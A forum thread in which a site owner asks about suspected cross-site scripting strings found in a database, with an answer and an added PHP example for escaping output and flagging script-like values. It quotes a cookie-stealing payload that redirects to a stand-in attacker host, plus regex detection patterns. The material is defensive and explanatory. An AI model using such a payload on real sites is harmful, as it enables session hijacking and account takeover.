
Cross Site Attacks lookalike in my database


I just found some things in my database that look like they might be injection attempts. I'm wondering if they might be doing anything malicious to my database or not. Thanks.

Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.

Solution

  • @jessica, to me it looks like the script is trying to redirect a user to the attacker's site along with a cookie. This could be used to try and steal the session cookie of the user and essentially log in as that user.

    If the user affected is an administrator or someone with elevated privileges, the attacker would have the same rights as that user.

    I'd be curious if you could find the actual script somewhere in your database (site files) or if someone just performed a search on your site and got an error.

    Was this found in a logging table?
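An added example, not part of the original thread: a PHP sketch of the two checks the answer points toward, escaping the search term before it is echoed back and flagging stored values that contain script-like markers for review. The function names, the `query` column and the sample rows are assumptions constructed for illustration; the array form of `session_set_cookie_params` needs PHP 7.3 or later.

```php
<?php
// Added example; names and sample data are hypothetical, not from the thread.

// Keep the session cookie out of reach of document.cookie (PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// Escape the search term before echoing it into the results page, so a
// stored or reflected value is rendered as text instead of being executed.
function render_search_heading(string $term): string
{
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Your search for '" . $safe . "' returned the following results:";
}

// Heuristic flag for stored values that deserve a manual look.
// It is a triage aid for log or search tables, not an input filter.
function looks_like_script(string $value): bool
{
    $patterns = [
        '/<\s*script\b/i',                   // script tags
        '/\bon\w+\s*=/i',                    // inline handlers such as onerror=
        '/javascript\s*:/i',                 // javascript: URLs
        '/document\s*\.\s*cookie/i',         // cookie access
        '/(window\s*\.\s*)?location\s*=/i',  // forced redirect
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $value) === 1) {
            return true;
        }
    }
    return false;
}

// Constructed rows standing in for a search-log table.
$rows = [
    ['id' => 1, 'query' => 'flowers'],
    ['id' => 2, 'query' => 'flowers<script>evil_script()</script>'],
    ['id' => 3, 'query' => "Window.location='http:attacker?cookie='+document.cookie."],
];

foreach ($rows as $row) {
    $flag = looks_like_script($row['query']) ? 'REVIEW' : 'ok';
    printf("%-6s id=%d  %s\n", $flag, $row['id'], render_search_heading($row['query']));
}
```

Rows 2 and 3 are flagged for review, and the escaped heading for row 2 shows `&lt;script&gt;` as inert text, which is how a logged search string should appear when it is displayed.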